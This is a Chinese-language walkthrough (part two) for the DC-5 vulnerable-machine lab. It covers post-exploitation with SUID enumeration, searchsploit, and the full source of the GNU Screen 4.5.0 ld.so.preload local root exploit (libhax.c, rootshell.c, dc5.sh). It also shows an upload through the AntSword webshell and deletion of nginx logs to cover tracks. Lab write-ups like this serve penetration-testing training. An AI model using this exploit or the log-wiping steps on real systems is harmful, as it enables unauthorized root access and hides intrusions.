DC-5渗透测试教程详解(下)

简介: DC-5渗透测试教程详解

后渗透测试

查看提权文件

在kali上输入python -c ‘import pty;pty.spawn(“/bin/bash”)’

6622cc823c8b4f2c85d797bd766eefb7.png


找到具有SUID的文件,文件,用来提权。find / -perm -u=s -type f 2>/dev/null

b0f90092119e444f93fb30e09959e379.png


查找EXP, 重新打开一个终端,在kali中通过命令searchsploit查看screen-4.5.0的漏洞。

0e720dcd4cf649fca8eba31a75c06a47.png


创建脚本

2764dc2bdcef45b983a0ac36bd659251.png


复制的脚本没办法直接执行,所以需要将其拆分为多个文件处理。


在kali的root文件夹下新建文件,命名为libhax.c。


将41154.sh脚本中的第一部分内容复制到libhax.c文件 。

ac25392edc544438aad2b9a115694ddf.png


将脚本中选中内容复制到libhax.c文件中。

0e478bf95e184245a064637a8f7519eb.png


在libhax.c文件中添加所选中的语句

2dc3a30632f940089a487537c5b4e8a6.png


libhax.c的内容:(第一个文件内容)


#include<stdio.h>#include<sys/types.h>#include<unistd.h>__attribute__ ((__constructor__))
voiddropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}


将libhax.c文件ctrl s保存,然后打开终端窗口,在终端窗口里执行命令

用来生成动态库文件libhax.so

gcc-fPIC-shared-ldl-olibhax.solibhax.c


在kali的root文件夹下新建文件命名为rootshell.c,用来处理脚本中的第二部分内容

将41154.sh脚本中的选中部分,复制到rootshell.c文件中

7b0c50e24e7d43fd9eed9f853abc78e0.png

在rootshell.c文件中,第二行添加语句#include<unistd.h>,在文件的倒数第二行,删掉一个多余的NULL .

rootshell.c的文件内容:(第二个文件内容)

#include<stdio.h>#include<unistd.h>intmain(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh",NULL);
}


保存并退出rootshell.c文件,在kali的终端窗口中,输入命令gcc rootshell.c –o rootshell,用来生成一个可以执行的二进制文件.

gcc-orootshellrootshell.c


将41154.sh脚本中的最后一部分内容,复制到dc5.sh文件中

dc5.sh文件内容:(最后一个文件内容):

echo"[+] Now we create our /etc/ld.so.preload file..."cd/etcumask000#becausescreen-D-m-Lld.so.preloadecho-ne"\x0a/tmp/libhax.so"#newlineneededecho"[+] Triggering..."screen-ls#screenitselfissetuid, so... 
/tmp/rootshell


在终端窗口中,按esc,再按shift + : ,窗口底部应该出现冒号,输入set ff=unix,回车

00898364065c466ca2feb991169befe1.png

在kali中复制刚刚制作好的三个文件,到Windows中的任意位置。

使用蚁剑上传文件提权

打开蚁剑,找到/tmp目录,右键上传文件

d3bad957f3eb4b78b900b519161c110c.png

65f352eebcb640f784261c690031d115 (1).png

c92aa942ede843cba3a82f69d14cec0c.png



给dc5.sh文件添加可执行权限


chmod+xdc5.sh


执行脚本 ./dc5.sh

a1d2f7ccf10f4d41bde0aa0d60f975e5.png

0f6bf6a20d0041b2ac8bdbc204135a52.png


拿到flag

2f514b10587e476db82245c5f768c32e.png


清理痕迹

删除上传的三个提权文件

删除/var/log/nginx/error.log的日志文件

渗透测试报告

使用报告文档交流在渗透测试过程踪做了哪些,如何做,以及最为重要的—客户如何修复你发现的安全漏洞与弱点。

相关文章
|
9天前
|
自然语言处理 机器人 Python
ChatGPT使用学习:ChatPaper安装到测试详细教程(一文包会)
ChatPaper是一个基于文本生成技术的智能研究论文工具,能够根据用户输入进行智能回复和互动。它支持快速下载、阅读论文,并通过分析论文的关键信息帮助用户判断是否需要深入了解。用户可以通过命令行或网页界面操作,进行论文搜索、下载、总结等。
21 1
ChatGPT使用学习:ChatPaper安装到测试详细教程(一文包会)
|
10天前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
22 4
|
10天前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
24 4
|
16天前
|
缓存 测试技术 Apache
告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
【10月更文挑战第1天】告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
45 4
|
2月前
|
存储 Ubuntu 安全
ROS2教程02 ROS2的安装、配置和测试
本文是关于ROS2(机器人操作系统2)的安装、配置和测试的教程。内容包括使用一键安装脚本快速安装ROS2 Humble版,手动安装步骤,设置语言环境、添加软件源、更新软件包、安装ROS2桌面版和开发工具,配置ROS2环境,创建工作空间,配置ROS2领域以避免网络冲突,以及如何删除ROS2。此外,还包括了测试ROS2是否安装成功的两个案例:基本的Topic通信测试和使用Turtlesim演示程序。适用于Ubuntu 22.04操作系统。
160 1
ROS2教程02 ROS2的安装、配置和测试
|
1月前
|
缓存 测试技术 Apache
告别卡顿!Python性能测试实战教程,JMeter&Locust带你秒懂性能优化💡
【9月更文挑战第5天】性能测试是确保应用在高负载下稳定运行的关键。本文介绍Apache JMeter和Locust两款常用性能测试工具,帮助识别并解决性能瓶颈。JMeter适用于测试静态和动态资源,而Locust则通过Python脚本模拟HTTP请求。文章详细讲解了安装、配置及使用方法,并提供了实战案例,帮助你掌握性能测试技巧,提升应用性能。通过分析测试结果、模拟并发、检查资源使用情况及代码优化,确保应用在高并发环境下表现优异。
62 5
|
2月前
|
测试技术 开发工具 虚拟化
iOS自动化测试方案(一):MacOS虚拟机保姆级安装Xcode教程
这篇文章提供了一份保姆级的教程,指导如何在MacOS虚拟机上安装Xcode,包括环境准备、基础软件安装以及USB扩展插件的使用,以实现iOS自动化测试方案的第一步。
65 0
iOS自动化测试方案(一):MacOS虚拟机保姆级安装Xcode教程
|
1月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
30 0
|
1月前
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
34 0
|
2月前
|
Java 测试技术 Maven
Junit单元测试 @Test的使用教程
这篇文章是一个关于Junit单元测试中`@Test`注解使用的教程,包括在Maven项目中添加Junit依赖、编写带有@Test注解的测试方法,以及解决@Test注解不生效的常见问题。